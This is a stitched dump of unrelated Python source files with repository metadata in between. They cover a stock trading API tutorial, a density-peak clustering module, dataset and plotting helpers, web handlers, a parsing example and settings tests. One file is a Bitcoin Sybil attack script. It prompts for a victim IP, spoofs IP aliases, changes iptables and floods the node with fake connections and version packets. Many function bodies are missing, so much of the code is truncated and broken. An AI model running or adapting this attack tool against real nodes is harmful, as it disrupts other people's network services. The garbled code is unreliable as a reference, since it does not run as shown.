2020-11-21T08:50:56.000Z
|
tutorial/43.py
|
mssung94/daishin-trading-system
|
d6682495afb7a08e68db65537b1d1789f2996891
|
[
"MIT"
] | null | null | null |
tutorial/43.py
|
mssung94/daishin-trading-system
|
d6682495afb7a08e68db65537b1d1789f2996891
|
[
"MIT"
] | null | null | null |
# API
# 2 BlockRequest Request
# API 2
#
# BlockRequest -
# Request Received
#
# 2
# BlockRequest
# , BlockRequest
#
# Request .
import pythoncom
from PyQt5.QtWidgets import *
import win32com.client
import win32event
g_objCodeMgr = win32com.client.Dispatch('CpUtil.CpCodeMgr')
StopEvent = win32event.CreateEvent(None, 0, 0, None)
def MessagePump(timeout):
waitables = [StopEvent]
while 1:
rc = win32event.MsgWaitForMultipleObjects(
waitables,
0, # Wait for all = false, so it waits for anyone
timeout, # (or win32event.INFINITE)
win32event.QS_ALLEVENTS) # Accepts all input
if rc == win32event.WAIT_OBJECT_0:
# Our first event listed, the StopEvent, was triggered, so we must exit
print('stop event')
break
elif rc == win32event.WAIT_OBJECT_0 + len(waitables):
# A windows message is waiting - take care of it. (Don't ask me
# why a WAIT_OBJECT_MSG isn't defined < WAIT_OBJECT_0...!).
# This message-serving MUST be done for COM, DDE, and other
# Windowsy things to work properly!
print('pump')
if pythoncom.PumpWaitingMessages():
break # we received a wm_quit message
elif rc == win32event.WAIT_TIMEOUT:
print('timeout')
return
pass
else:
print('exception')
raise RuntimeError("unexpected win32wait return value")
code = 'A005930'
##############################################################
# 1. BlockRequest
print('#####################################')
objStockMst = win32com.client.Dispatch("DsCbo1.StockMst")
objStockMst.SetInputValue(0, code)
objStockMst.BlockRequest()
print('BlockRequest ')
item = {}
item[''] = g_objCodeMgr.CodeToName(code)
item[''] = objStockMst.GetHeaderValue(11) #
item[''] = objStockMst.GetHeaderValue(12) #
print(item)
print('')
##############################################################
# 2. Request ==> ==> OnReceived
print('#####################################')
objReply = CpCurReply(objStockMst)
objReply.Subscribe()
code = 'A005930'
objStockMst.SetInputValue(0, code)
objStockMst.Request()
MessagePump(10000)
item = {}
item[''] = g_objCodeMgr.CodeToName(code)
item[''] = objStockMst.GetHeaderValue(11) #
item[''] = objStockMst.GetHeaderValue(12) #
print(item)
| 31.39823 | 84 | 0.590755 |
4c55db68c1c667219febb6705164366e8f8c7adb
| 18,439 |
py
|
Python
|
ADPTC_LIB/DPTree_ST.py
|
SuilandCoder/ADPTC_LIB
|
ef5c2b7fcf117c8c90a3841489471289ecbf4562
|
[
"MIT"
] | null | null | null |
ADPTC_LIB/DPTree_ST.py
|
SuilandCoder/ADPTC_LIB
|
ef5c2b7fcf117c8c90a3841489471289ecbf4562
|
[
"MIT"
] | null | null | null |
ADPTC_LIB/DPTree_ST.py
|
SuilandCoder/ADPTC_LIB
|
ef5c2b7fcf117c8c90a3841489471289ecbf4562
|
[
"MIT"
] | null | null | null |
#%%
import numpy as np
import copy
import matplotlib.pyplot as plt
import time
def split_cluster_new(tree,local_density,dc_eps,closest_denser_nodes_id,mixin_near_matrix):
'''
dc_eps: density_connectivity
outlier
outlier_forest
cluster_forest
'''
mean_density = np.mean(local_density)
outlier_forest = {}
cluster_forest = {}
uncertain_forest = {}
not_direct_reach = []
#*
for k in range(len(closest_denser_nodes_id)):
near_nodes = mixin_near_matrix[k]
if closest_denser_nodes_id[k] not in near_nodes:
not_direct_reach.append(k)
pass
not_direct_reach = np.array(not_direct_reach)
# not_direct_reach = np.where(closest_dis_denser>eps)[0]
#*
# not_direct_reach = np.array(not_direct_reach)
depth_list_not_direct_reach= np.zeros(len(not_direct_reach),dtype=np.int16)
for i in range(len(not_direct_reach)):
# depth_list_not_direct_reach[i] = tree.node_dir[not_direct_reach[i]].getLvl()
depth_list_not_direct_reach[i] = tree.calcu_depth(not_direct_reach[i],0)
pass
not_direct_reach = list(not_direct_reach[np.argsort(depth_list_not_direct_reach)])
#*
start = time.clock()
while(len(not_direct_reach)>0):
#*
node_id = not_direct_reach.pop()
if(node_id==129193 or node_id==61589 or node_id == 123593):
print(node_id)
if node_id in tree.sorted_gamma_index[0:10]:
cluster_forest[node_id] = tree.remove_subtree(node_id)
continue
node = tree.node_dir[node_id]
parent_id = node.parent_id
parent_node = tree.node_dir[parent_id]
children = parent_node.getChildren()
siblings_reliable = [ i for i in children if i not in not_direct_reach] #*
not_reliable_nodes = [i for i in children if i not in siblings_reliable]
if node_id in not_reliable_nodes:
not_reliable_nodes.remove(node_id)
if node_id in siblings_reliable:
siblings_reliable.remove(node_id)
pairs_nodes = is_connected_new(tree,local_density,dc_eps,node_id,siblings_reliable,not_reliable_nodes,mixin_near_matrix)
if len(pairs_nodes)==0:
if(node_id==tree.root_node.node_id):
continue
if(local_density[node_id]-mean_density*dc_eps)>=0:
#* :
offspring_id = tree.get_subtree_offspring_id(node_id,[node_id])
if(len(offspring_id)<local_density[node_id]):
uncertain_forest[node_id] = tree.remove_subtree(node_id)
pass
else:
cluster_forest[node_id] = tree.remove_subtree(node_id)
pass
pass
else:
outlier_forest[node_id] = tree.remove_subtree(node_id)
pass
pass
pass
end = time.clock()
print(' %s' % str(end - start))
cluster_forest[tree.root_node.node_id] = tree #*
return outlier_forest, cluster_forest, uncertain_forest
def is_connected_new(tree,local_density,dc_eps,cur_node_id,reliable_nodes,not_reliable_nodes,mixin_near_matrix):
'''
cur_node:
reliable_nodes
not_reliable_nodes
1. cur_node reliable_nodes 2
2. cur_node not_reliable_nodes([a,b,c,d,e]) [a,b,c][d,e]3
3. [a,b,c], is_connected_entropy(,cur_node_id=[a],reliable_nodes,not_reliable_nodes=[b,c,d,e])
'''
#* 1.
if(len(reliable_nodes)==0):
return []
for reliable_node_id in reliable_nodes:
pairs_nodes, connected_nodes = tree.calcu_neighbor_btw_subtree(cur_node_id,reliable_node_id,mixin_near_matrix)
if(len(pairs_nodes)==0):
continue
# return pairs_nodes
cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id])
local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
local_density_connected_nodes = np.mean(local_density[connected_nodes])
if(local_density_connected_nodes>local_density_cur_offspring*dc_eps):
return pairs_nodes
pass
#* 2.
for i in range(len(not_reliable_nodes)):
pairs_nodes, connected_nodes = tree.calcu_neighbor_btw_subtree(cur_node_id,not_reliable_nodes[i],mixin_near_matrix)
if(len(pairs_nodes)==0):
pairs_nodes = is_connected_new(tree,local_density,dc_eps,not_reliable_nodes[i],reliable_nodes,not_reliable_nodes[i+1:],mixin_near_matrix)
if(len(pairs_nodes)>0):
return pairs_nodes
else:
cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id])
local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
local_density_connected_nodes = np.mean(local_density[connected_nodes])
if(local_density_connected_nodes>local_density_cur_offspring*dc_eps):
return pairs_nodes
# return pairs_nodes
# #*
cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id])
local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
local_density_connected_nodes = np.mean(local_density[connected_nodes])
if(local_density_connected_nodes>local_density_cur_offspring*dc_eps):
return pairs_nodes
if(len(pairs_nodes)==0):
pairs_nodes = is_connected_new(tree,local_density,dc_eps,not_reliable_nodes[i],reliable_nodes,not_reliable_nodes[i+1:],mixin_near_matrix)
if(len(pairs_nodes)>0):
return pairs_nodes
# pass
return []
def label_these_node_new(outlier_forest,cluster_forest,node_num,uncertain_forest,mixin_near_matrix):
'''
'''
labels = np.full((node_num),-1,dtype=np.int32)
for outlier_id in outlier_forest:
outlier_tree = outlier_forest[outlier_id]
outlier_idlist = outlier_tree.get_subtree_offspring_id(outlier_id,[outlier_id])
labels[outlier_idlist] = -1
pass
label = 0
for tree_id in cluster_forest:
cluster_tree = cluster_forest[tree_id]
cluster_idlist = cluster_tree.get_subtree_offspring_id(tree_id,[tree_id])
labels[cluster_idlist] = label
label = label + 1
pass
#todo
for uncertain_tree_id in uncertain_forest:
uncertain_tree = uncertain_forest[uncertain_tree_id]
uncertain_nodes_id = uncertain_tree.get_subtree_offspring_id(uncertain_tree_id,[uncertain_tree_id])
all_near_nodes = np.array([],dtype=np.int32)
for node_id in uncertain_nodes_id:
all_near_nodes = np.append(all_near_nodes,mixin_near_matrix[node_id])
pass
# all_near_nodes = mixin_near_matrix[uncertain_nodes_id]
all_near_nodes = np.unique(all_near_nodes)
all_near_nodes = all_near_nodes[np.where(labels[all_near_nodes]!=-1)]
unique_labels,counts=np.unique(labels[all_near_nodes],return_counts=True)
if(len(counts)==0):
cur_label = -1
else:
cur_label = unique_labels[np.argmax(counts)]
labels[uncertain_nodes_id]=cur_label
pass
core_points = cluster_forest.keys()
return labels,core_points
'''
cfsfdp DPTree
'''
| 38.575314 | 186 | 0.633548 |
4c56a26b957f0f1d768b5949bae27c075bbc9817
| 10,280 |
py
|
Python
|
datasets/tao/tao.py
|
Nik-V9/AirObject
|
5937e64531f08449e81d2c90e3c6643727efbaf0
|
[
"BSD-3-Clause"
] | 9 |
2022-03-15T17:28:48.000Z
|
2022-03-29T12:32:28.000Z
|
datasets/tao/tao.py
|
Nik-V9/AirObject
|
5937e64531f08449e81d2c90e3c6643727efbaf0
|
[
"BSD-3-Clause"
] | 1 |
2022-03-29T06:03:14.000Z
|
2022-03-29T13:38:29.000Z
|
datasets/tao/tao.py
|
Nik-V9/AirObject
|
5937e64531f08449e81d2c90e3c6643727efbaf0
|
[
"BSD-3-Clause"
] | 1 |
2022-03-15T19:34:06.000Z
|
2022-03-15T19:34:06.000Z
|
from __future__ import print_function
import sys
sys.path.append('.')
import os
from typing import Optional, Union
import cv2
import numpy as np
import PIL.Image as Image
import pickle
import torch
from torch.utils import data
__all__ = ["TAO"]
| 41.788618 | 135 | 0.569163 |
4c573a085ee0bd360c33de2b14ef3c06c724afc8
| 2,572 |
py
|
Python
|
Platforms/Web/Processing/Api/Discord/Configs/Quotedisabledchannels/errors.py
|
The-CJ/Phaazebot
|
83a9563d210718071d4e2cdcca3b212c87abaf51
|
[
"MIT"
] | 2 |
2017-09-14T08:07:55.000Z
|
2021-05-18T05:05:05.000Z
|
Platforms/Web/Processing/Api/Discord/Configs/Quotedisabledchannels/errors.py
|
The-CJ/Phaazebot
|
83a9563d210718071d4e2cdcca3b212c87abaf51
|
[
"MIT"
] | 111 |
2018-04-15T14:32:14.000Z
|
2021-03-28T21:06:29.000Z
|
Platforms/Web/Processing/Api/Discord/Configs/Quotedisabledchannels/errors.py
|
The-CJ/Phaazebot
|
83a9563d210718071d4e2cdcca3b212c87abaf51
|
[
"MIT"
] | 1 |
2018-04-15T13:24:44.000Z
|
2018-04-15T13:24:44.000Z
|
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from Platforms.Web.main_web import PhaazebotWeb
import json
from aiohttp.web import Response
from Utils.Classes.extendedrequest import ExtendedRequest
| 28.577778 | 127 | 0.691291 |
4c59684045a1dab8436432732a93183e33f7d39d
| 3,853 |
py
|
Python
|
augmentation/ISDA.py
|
RichardScottOZ/sota-data-augmentation-and-optimizers
|
60128ca762ac2864a3b54c43c36d1d5aa2033e5a
|
[
"MIT"
] | 31 |
2020-01-14T20:03:31.000Z
|
2022-01-07T08:02:09.000Z
|
augmentation/ISDA.py
|
RichardScottOZ/sota-data-augmentation-and-optimizers
|
60128ca762ac2864a3b54c43c36d1d5aa2033e5a
|
[
"MIT"
] | null | null | null |
augmentation/ISDA.py
|
RichardScottOZ/sota-data-augmentation-and-optimizers
|
60128ca762ac2864a3b54c43c36d1d5aa2033e5a
|
[
"MIT"
] | 6 |
2020-03-04T09:31:45.000Z
|
2021-11-21T18:47:15.000Z
|
import torch
import torch.nn as nn
| 29.868217 | 104 | 0.536465 |
4c59cbad1a1c628d8be0abf3472039d2b0fe36c6
| 22,828 |
py
|
Python
|
netpyne/plotting/plotter.py
|
sanjayankur31/netpyne
|
d8b7e94cabeb27e23e30853ff17ae86518b35ac2
|
[
"MIT"
] | null | null | null |
netpyne/plotting/plotter.py
|
sanjayankur31/netpyne
|
d8b7e94cabeb27e23e30853ff17ae86518b35ac2
|
[
"MIT"
] | null | null | null |
netpyne/plotting/plotter.py
|
sanjayankur31/netpyne
|
d8b7e94cabeb27e23e30853ff17ae86518b35ac2
|
[
"MIT"
] | null | null | null |
"""
Module for plotting analyses
"""
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from copy import deepcopy
import pickle, json
import os
from matplotlib.offsetbox import AnchoredOffsetbox
try:
basestring
except NameError:
basestring = str
colorList = [[0.42, 0.67, 0.84], [0.90, 0.76, 0.00], [0.42, 0.83, 0.59], [0.90, 0.32, 0.00], [0.34, 0.67, 0.67], [0.90, 0.59, 0.00], [0.42, 0.82, 0.83], [1.00, 0.85, 0.00], [0.33, 0.67, 0.47], [1.00, 0.38, 0.60], [0.57, 0.67, 0.33], [0.50, 0.20, 0.00], [0.71, 0.82, 0.41], [0.00, 0.20, 0.50], [0.70, 0.32, 0.10]] * 3
def add_scalebar(axis, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs):
"""
Add scalebars to axes
Adds a set of scale bars to *ax*, matching the size to the ticks of the plot and optionally hiding the x and y axes
- axis : the axis to attach ticks to
- matchx,matchy : if True, set size of scale bars to spacing between ticks, if False, set size using sizex and sizey params
- hidex,hidey : if True, hide x-axis and y-axis of parent
- **kwargs : additional arguments passed to AnchoredScaleBars
Returns created scalebar object
"""
if matchx:
sizex = get_tick_size(axis.xaxis)
if matchy:
sizey = get_tick_size(axis.yaxis)
if 'sizex' in kwargs:
sizex = kwargs['sizex']
if 'sizey' in kwargs:
sizey = kwargs['sizey']
if ymax is not None and sizey>ymax:
sizey = autosize(sizey, ymax, scaley)
if xmax is not None and sizex>xmax:
sizex = autosize(sizex, xmax, scalex)
kwargs['sizex'] = sizex
kwargs['sizey'] = sizey
if unitsx is None:
unitsx = ''
if unitsy is None:
unitsy = ''
if 'labelx' not in kwargs or kwargs['labelx'] is None:
kwargs['labelx'] = '%.3g %s'%(kwargs['sizex'] * scalex, unitsx)
if 'labely' not in kwargs or kwargs['labely'] is None:
kwargs['labely'] = '%.3g %s'%(kwargs['sizey'] * scaley, unitsy)
# add space for scalebar
if space is not None:
ylim0, ylim1 = axis.get_ylim()
ylim = (ylim0 - space, ylim1)
if ylim0 > ylim1: # if y axis is inverted
ylim = (ylim0 + space, ylim1)
axis.set_ylim(ylim)
scalebar = AnchoredScaleBar(axis, **kwargs)
axis.add_artist(scalebar)
if hidex:
axis.xaxis.set_visible(False)
if hidey:
axis.yaxis.set_visible(False)
if hidex and hidey:
axis.set_frame_on(False)
return scalebar
| 34.535552 | 376 | 0.56987 |
4c5b0cb42835f92d5cfa623b7b0648900462ba33
| 1,069 |
py
|
Python
|
examples/simpleWiki.py
|
klahnakoski/mo-parsing
|
885bf3fd61430d5fa15164168b975b18988fcf9e
|
[
"MIT"
] | 1 |
2021-10-30T21:18:29.000Z
|
2021-10-30T21:18:29.000Z
|
examples/simpleWiki.py
|
klahnakoski/mo-parsing
|
885bf3fd61430d5fa15164168b975b18988fcf9e
|
[
"MIT"
] | 22 |
2020-04-15T14:49:30.000Z
|
2021-12-22T02:49:52.000Z
|
examples/simpleWiki.py
|
klahnakoski/mo-parsing
|
885bf3fd61430d5fa15164168b975b18988fcf9e
|
[
"MIT"
] | null | null | null |
from mo_parsing.helpers import QuotedString
wikiInput = """
Here is a simple Wiki input:
*This is in italics.*
**This is in bold!**
***This is in bold italics!***
Here's a URL to {{Pyparsing's Wiki Page->https://site-closed.wikispaces.com}}
"""
italicized = QuotedString("*").add_parse_action(convertToHTML("<I>", "</I>"))
bolded = QuotedString("**").add_parse_action(convertToHTML("<B>", "</B>"))
boldItalicized = QuotedString("***").add_parse_action(convertToHTML("<B><I>", "</I></B>"))
urlRef = QuotedString("{{", end_quote_char="}}").add_parse_action(convertToHTML_A)
wikiMarkup = urlRef | boldItalicized | bolded | italicized
| 28.131579 | 91 | 0.635173 |
4c5b215bf00e243da89ca4e94c55e9e94a7ff44a
| 9,885 |
py
|
Python
|
tests/test_app_settings_dict.py
|
wheelercj/app_settings
|
06224dec0b5baf1eeb92e5a81ca4e8385d4942a6
|
[
"MIT"
] | null | null | null |
tests/test_app_settings_dict.py
|
wheelercj/app_settings
|
06224dec0b5baf1eeb92e5a81ca4e8385d4942a6
|
[
"MIT"
] | null | null | null |
tests/test_app_settings_dict.py
|
wheelercj/app_settings
|
06224dec0b5baf1eeb92e5a81ca4e8385d4942a6
|
[
"MIT"
] | null | null | null |
import pytest
import re
from typing import Any, Tuple
from dataclasses import dataclass
from app_settings_dict import Settings
| 27.84507 | 86 | 0.527466 |
4c5b696f9bc64bbbc8bda141e564e9a8de0891a8
| 5,910 |
py
|
Python
|
demo/demo_FSANET_ssd.py
|
jacke121/FSA-Net
|
c4d60bd38e9d17b0ea33d824ec443a01bdeba015
|
[
"Apache-2.0"
] | null | null | null |
demo/demo_FSANET_ssd.py
|
jacke121/FSA-Net
|
c4d60bd38e9d17b0ea33d824ec443a01bdeba015
|
[
"Apache-2.0"
] | null | null | null |
demo/demo_FSANET_ssd.py
|
jacke121/FSA-Net
|
c4d60bd38e9d17b0ea33d824ec443a01bdeba015
|
[
"Apache-2.0"
] | null | null | null |
import os
import time
import cv2
import sys
sys.path.append('..')
import numpy as np
from math import cos, sin
from lib.FSANET_model import *
import numpy as np
from keras.layers import Average
if __name__ == '__main__':
main()
| 34.16185 | 122 | 0.577496 |
4c5b93a68b2014eb34642b9dabeaf09a9053d01e
| 5,118 |
py
|
Python
|
examples/app_commands/slash_autocomplete.py
|
Mihitoko/pycord
|
137c1474eed5fb4273e542bd22ad76764a8712fc
|
[
"MIT"
] | null | null | null |
examples/app_commands/slash_autocomplete.py
|
Mihitoko/pycord
|
137c1474eed5fb4273e542bd22ad76764a8712fc
|
[
"MIT"
] | null | null | null |
examples/app_commands/slash_autocomplete.py
|
Mihitoko/pycord
|
137c1474eed5fb4273e542bd22ad76764a8712fc
|
[
"MIT"
] | 1 |
2022-02-20T09:10:40.000Z
|
2022-02-20T09:10:40.000Z
|
import discord
from discord.commands import option
bot = discord.Bot(debug_guilds=[...])
COLORS = ["red", "orange", "yellow", "green", "blue", "indigo", "violet"]
LOTS_OF_COLORS = [
"aliceblue",
"antiquewhite",
"aqua",
"aquamarine",
"azure",
"beige",
"bisque",
"blueviolet",
"brown",
"burlywood",
"cadetblue",
"cornflowerblue",
"cornsilk",
"crimson",
"cyan",
"darkblue",
"deepskyblue",
"dimgray",
"dimgrey",
"dodgerblue",
"firebrick",
"floralwhite",
"forestgreen",
"fuchsia",
"gainsboro",
"ghostwhite",
"gold",
"goldenrod",
"gray",
"green",
"greenyellow",
"grey",
"honeydew",
"hotpink",
"indianred",
"indigo",
"ivory",
"khaki",
"lavender",
"lavenderblush",
"lawngreen",
"lightcoral",
"maroon",
"mediumaquamarine",
"mediumblue",
"mediumorchid",
"midnightblue",
"navajowhite",
"navy",
"oldlace",
"olive",
"olivedrab",
"orange",
"orangered",
"orchid",
"palegoldenrod",
"palegreen",
"plum",
"powderblue",
"purple",
"red",
"rosybrown",
"royalblue",
"saddlebrown",
"sienna",
"springgreen",
"steelblue",
"tan",
"teal",
"thistle",
"tomato",
"turquoise",
"violet",
"wheat",
"white",
"whitesmoke",
"yellow",
"yellowgreen",
]
BASIC_ALLOWED = [...] # This would normally be a list of discord user IDs for the purpose of this example
bot.run("TOKEN")
| 27.079365 | 112 | 0.657679 |
4c5bad7796ac5e7201e5d6fb5312abee3b503a5c
| 11,522 |
py
|
Python
|
tools/Networking/sybil_block_no_ban.py
|
simewu/bitcoin_researcher
|
b9fd2efdb8ae8467c5bd4b3320713a541635df16
|
[
"MIT"
] | 1 |
2020-02-15T21:44:04.000Z
|
2020-02-15T21:44:04.000Z
|
tools/Networking/sybil_block_no_ban.py
|
SimeoW/bitcoin
|
3644405f06c8b16a437513e8c02f0f061b91be2e
|
[
"MIT"
] | null | null | null |
tools/Networking/sybil_block_no_ban.py
|
SimeoW/bitcoin
|
3644405f06c8b16a437513e8c02f0f061b91be2e
|
[
"MIT"
] | null | null | null |
from _thread import start_new_thread
from bitcoin.messages import *
from bitcoin.net import CAddress
from bitcoin.core import CBlock
from io import BytesIO as _BytesIO
import atexit
import bitcoin
import fcntl
import hashlib
import json
import os
import random
import re
import socket
import struct
import sys
import time
import datetime
if os.geteuid() != 0:
sys.exit("\nYou need to have root privileges to run this script.\nPlease try again, this time using 'sudo'. Exiting.\n")
# Specify the attacker's genuine IP
attacker_ip = input('\nEnter attacker\'s IP address: ')
# Specify the victim's IP, and port (8333 for Bitcoin)
victim_ip = input('Enter victim\'s IP address: ')
victim_port = 8333
# How many identities should run simultaneously
num_identities = 8
# While attacking the victim, wait this many seconds before sending each version message
seconds_between_version_packets = 0.1
identity_interface = [] # Keeps the IP alias interface and IP for each successful connection
identity_address = [] # Keeps the IP and port for each successful connection
identity_socket = [] # Keeps the socket for each successful connection
# The file where the iptables backup is saved, then restored when the script ends
iptables_file_path = f'{os.path.abspath(os.getcwd())}/backup.iptables.rules'
# Send commands to the Linux terminal
# Send commands to the Bitcoin Core Console
# Generate a random identity using the broadcast address template
# Checking the internet by sending a single ping to Google
#def internet_is_active():
# return os.system('ping -c 1 google.com') == 0
# If all else fails, we can use this to recover the network
#def reset_network():
# print('Resetting network...')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} down')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} up')
# Create an alias for a specified identity
# Construct a block packet using python-bitcoinlib
# Construct a version packet using python-bitcoinlib
# Close a connection
# Creates a fake connection to the victim
# Send version repeatedly, until banned
# Initialize the network
# Initialize Bitcoin info
# Save a backyp of the iptable rules
# Restore the backup of the iptable rules
# Remove all ip aliases that were created by the script
# This function is ran when the script is stopped
# This is the first code to run
if __name__ == '__main__':
global alias_num
alias_num = 0 # Increments each alias
initialize_network_info()
initialize_bitcoin_info()
atexit.register(on_close) # Make on_close() run when the script terminates
cleanup_iptables() # Restore any pre-existing iptables before backing up, just in case if the computer shutdown without restoring
backup_iptables()
# Create the connections
for i in range(1, num_identities + 1):
try:
make_fake_connection(src_ip = random_ip(), dst_ip = victim_ip)
except ConnectionRefusedError:
print('Connection was refused. The victim\'s node must not be running.')
print(f'Successful connections: {len(identity_address)}\n')
# Prevent the script from terminating when the sniff function is still active
while 1:
time.sleep(60)
| 34.497006 | 359 | 0.743881 |
4c5c39c5c86dfe51c79bcbc35385263a0ba508a1
| 1,638 |
py
|
Python
|
spider/db.py
|
aloneZERO/douban-movie-visualization
|
8e59c4d0b00df1b240a5dce09093ae4984fd7118
|
[
"WTFPL"
] | null | null | null |
spider/db.py
|
aloneZERO/douban-movie-visualization
|
8e59c4d0b00df1b240a5dce09093ae4984fd7118
|
[
"WTFPL"
] | null | null | null |
spider/db.py
|
aloneZERO/douban-movie-visualization
|
8e59c4d0b00df1b240a5dce09093ae4984fd7118
|
[
"WTFPL"
] | null | null | null |
#!python3
'''
author: justZero
email: [email protected]
date: 2017-8-6
'''
import time
import pandas as pd
import numpy as np
import pymysql
import pymysql.cursors
import pprint
if __name__ == '__main__':
inputFile = 'data/douban_movie_clean.txt'
movies_df = pd.read_csv(inputFile, sep='^')
movies = np.array(movies_df).tolist()
db = MySQLdb()
try:
db.insert_movie(movies)
except Exception as e:
raise e
finally:
db.close()
| 25.2 | 156 | 0.566545 |
4c5d1777ffd1452788619a58c2a3c09a88985225
| 2,077 |
py
|
Python
|
examples/rxff-serial/run.py
|
sctiwari/EZFF_ASE
|
94710d4cf778ff2db5e6df0cd6d10d92e1b98afe
|
[
"MIT"
] | 3 |
2019-01-22T21:22:09.000Z
|
2019-04-02T22:50:40.000Z
|
examples/rxff-serial/run.py
|
ElsevierSoftwareX/SOFTX-D-20-00066
|
b43f8bbb1321d7ed3eeec4f8bb894fe431779433
|
[
"MIT"
] | 14 |
2019-01-14T18:33:15.000Z
|
2019-07-08T22:10:11.000Z
|
examples/rxff-serial/run.py
|
ElsevierSoftwareX/SOFTX-D-20-00066
|
b43f8bbb1321d7ed3eeec4f8bb894fe431779433
|
[
"MIT"
] | 3 |
2019-03-24T23:43:13.000Z
|
2021-09-12T13:45:08.000Z
|
import ezff
from ezff.interfaces import gulp, qchem
# Define ground truths
gt_gs = qchem.read_structure('ground_truths/optCHOSx.out')
gt_gs_energy = qchem.read_energy('ground_truths/optCHOSx.out')
gt_scan = qchem.read_structure('ground_truths/scanCHOSx.out')
gt_scan_energy = qchem.read_energy('ground_truths/scanCHOSx.out')
# Read template and variable ranges
bounds = ezff.read_variable_bounds('variable_bounds', verbose=False)
template = ezff.read_forcefield_template('template')
problem = ezff.OptProblem(num_errors = 1, variable_bounds = bounds, error_function = my_error_function, template = template)
algorithm = ezff.Algorithm(problem, 'NSGAII', population = 16)
ezff.optimize(problem, algorithm, iterations = 5)
| 37.763636 | 124 | 0.735676 |
4c5db4db71b2cfe512dcdca6c87e641cb929544e
| 2,288 |
py
|
Python
|
dev_files/utils.py
|
dylanwal/unit_parse
|
07a74d43b9f161bd7ad6ef12ab0f362f1bf6a90d
|
[
"BSD-3-Clause"
] | 1 |
2022-01-29T17:14:40.000Z
|
2022-01-29T17:14:40.000Z
|
dev_files/utils.py
|
dylanwal/unit_parse
|
07a74d43b9f161bd7ad6ef12ab0f362f1bf6a90d
|
[
"BSD-3-Clause"
] | null | null | null |
dev_files/utils.py
|
dylanwal/unit_parse
|
07a74d43b9f161bd7ad6ef12ab0f362f1bf6a90d
|
[
"BSD-3-Clause"
] | null | null | null |
import logging
from testing_func import testing_func, test_logger
from unit_parse import logger, Unit, Q
from unit_parse.utils import *
test_logger.setLevel(logging.DEBUG)
logger.setLevel(logging.DEBUG)
test_split_list = [
# positive control (changes)
[["fish","pig", "cow"], ["f", "is", "h", "pig", "cow"], {"chunks": ["is"]}],
[["fish", Unit("g"), "cow"], ["f", "is", "h", Unit("g"), "cow"], {"chunks": ["is"]}],
[["fishpigcow"], ["f", "i", "shpigcow"], {"chunks": ["i"]}],
[["fishpigcow"], ["f", "i", "shpig", "c", "ow"], {"chunks": ["i", "c"]}],
# negative control (no changes)
[["fish"], ["fish"], {"chunks": ["fish"]}],
[["fishpigcow"], ["fishpigcow"], {"chunks": ["z"]}],
[[Unit("g")], [Unit("g")], {"chunks": ["is"]}],
]
testing_func(split_list, test_split_list)
test_round_off = [ # [Input, Output]
# positive control (works)
[234.2342300000001, 234.23423, {"sig_digit": 15}],
[234.2342399999999999, 234.23424, {"sig_digit": 15}],
[234.2342300000001, 234.23, {"sig_digit": 5}],
[234.2342399999999999, 234.23, {"sig_digit": 5}],
[234.2342399999999999, 200, {"sig_digit": 1}],
[-234.2342399999999999, -200, {"sig_digit": 1}],
[-234.2342399999999999, -234.23424, {"sig_digit": 15}],
# negative control (fails)
]
testing_func(sig_figs, test_round_off)
test_list_depth = [ # [Input, Output]
# positive control (works)
["", 0],
[[], 0],
["asds", 0],
[1, 0],
[["aaa"], 1],
[[["aaa"]], 2],
[[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
[[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
[[[["aaa"], ["aaa"], ["aaa"]]], 3],
# negative control (fails)
]
testing_func(get_list_depth, test_list_depth)
test_remove_empty_cells = [ # [Input, Output]
# positive control (works)
[[], None],
[[""], None],
[["asds"], ["asds"]],
[1, 1],
[["aaa", ""], ["aaa"]],
[["aaa", []], ["aaa"]],
[[["aaa", []]], [["aaa"]]],
[[["aaa", [""]]], [["aaa"]]],
# negative control (fails)
]
testing_func(remove_empty_cells, test_remove_empty_cells)
examples_quantity_difference = [
[Q("5 g"), Q("0.5"), {"quantity2": Q("10 g")}],
[5, 1, {"quantity2": Q("10 g")}],
]
testing_func(quantity_difference, examples_quantity_difference)
| 27.566265 | 89 | 0.542832 |
4c5e8dbae6d19592874e45bede3206b69cd9c042
| 594 |
py
|
Python
|
genlicense.py
|
d53dave/python-crypto-licensecheck
|
d11612612ea54a5418fd8dbba9212a9c84c56f22
|
[
"CNRI-Python",
"RSA-MD"
] | null | null | null |
genlicense.py
|
d53dave/python-crypto-licensecheck
|
d11612612ea54a5418fd8dbba9212a9c84c56f22
|
[
"CNRI-Python",
"RSA-MD"
] | null | null | null |
genlicense.py
|
d53dave/python-crypto-licensecheck
|
d11612612ea54a5418fd8dbba9212a9c84c56f22
|
[
"CNRI-Python",
"RSA-MD"
] | null | null | null |
import sys
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
from Crypto.PublicKey import RSA
if __name__ == '__main__':
key_file = sys.argv[1]
input_string = sys.argv[2]
out_file = sys.argv[3]
sign_data(key_file, input_string, out_file)
| 28.285714 | 53 | 0.66835 |
4c5f21108bc3014442b8b88f1279054fc89706f5
| 5,302 |
py
|
Python
|
freqtrade/strategy/informative_decorator.py
|
Fractate/freqbot
|
47b35d2320dc97977411454c1466c762d339fdee
|
[
"MIT"
] | 1 |
2022-03-06T22:44:30.000Z
|
2022-03-06T22:44:30.000Z
|
freqtrade/strategy/informative_decorator.py
|
Fractate/freqbot
|
47b35d2320dc97977411454c1466c762d339fdee
|
[
"MIT"
] | null | null | null |
freqtrade/strategy/informative_decorator.py
|
Fractate/freqbot
|
47b35d2320dc97977411454c1466c762d339fdee
|
[
"MIT"
] | 1 |
2021-09-22T23:28:21.000Z
|
2021-09-22T23:28:21.000Z
|
from typing import Any, Callable, NamedTuple, Optional, Union
from pandas import DataFrame
from freqtrade.exceptions import OperationalException
from freqtrade.strategy.strategy_helper import merge_informative_pair
